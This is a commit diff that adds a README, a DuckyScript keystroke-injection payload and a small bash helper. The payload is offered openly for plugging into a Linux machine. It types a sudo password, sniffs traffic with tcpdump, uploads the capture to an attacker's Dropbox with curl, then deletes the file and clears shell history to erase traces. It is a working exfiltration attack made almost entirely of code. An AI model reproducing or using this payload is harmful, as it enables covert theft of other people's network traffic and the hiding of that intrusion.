commit
ea645e3110
|
@ -0,0 +1,27 @@
|
|||
# Exfiltrate Network Traffic - Linux ✅
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
**Category**: Exfiltrate
|
||||
|
||||
## Description
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Permissions
|
||||
* Internet Connection
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
* Set the sniffing filter
|
|
@ -0,0 +1,107 @@
|
|||
|
||||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Network Traffic |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #############################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||
DEFINE SNIFFING example
|
||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||
DEFINE TOKEN example
|
||||
REM Just a Dropbox const
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
REM Output file path packets.pcap, remember to use pcap extension
|
||||
DEFINE FILE example.pcap
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRINGLN sudo su
|
||||
DELAY 1000
|
||||
STRINGLN SUDO_PASS
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### Network Traffic SECTION ####
|
||||
|
||||
|
||||
STRING FILE_PATH="
|
||||
STRING FILE
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING filter_expression="
|
||||
STRING SNIFFING
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Network card name
|
||||
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
DELAY 500
|
||||
|
||||
REM Network dump
|
||||
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||
DELAY 500
|
||||
|
||||
REM Get PID
|
||||
STRINGLN tcpdump_pid=$!
|
||||
|
||||
REM Set how long you want to sniff
|
||||
DELAY 60000
|
||||
|
||||
REM Kill the process by PID
|
||||
STRINGLN kill $tcpdump_pid
|
||||
|
||||
|
||||
REM #### Exfiltrate SECTION ####
|
||||
REM You can use whatever you want, i use Dropbox
|
||||
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||
DELAY 500
|
||||
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
ENTER
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRINGLN rm "$FILE_PATH"
|
||||
DELAY 500
|
||||
|
||||
STRINGLN history -c
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRINGLN exit
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRINGLN exit
|
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
|
||||
filter_expression="tcp port 80"
|
||||
|
||||
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
|
||||
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
|
||||
tcpdump_pid=$!
|
||||
|
||||
sleep 60
|
||||
|
||||
kill $tcpdump_pid
|
Loading…
Reference in New Issue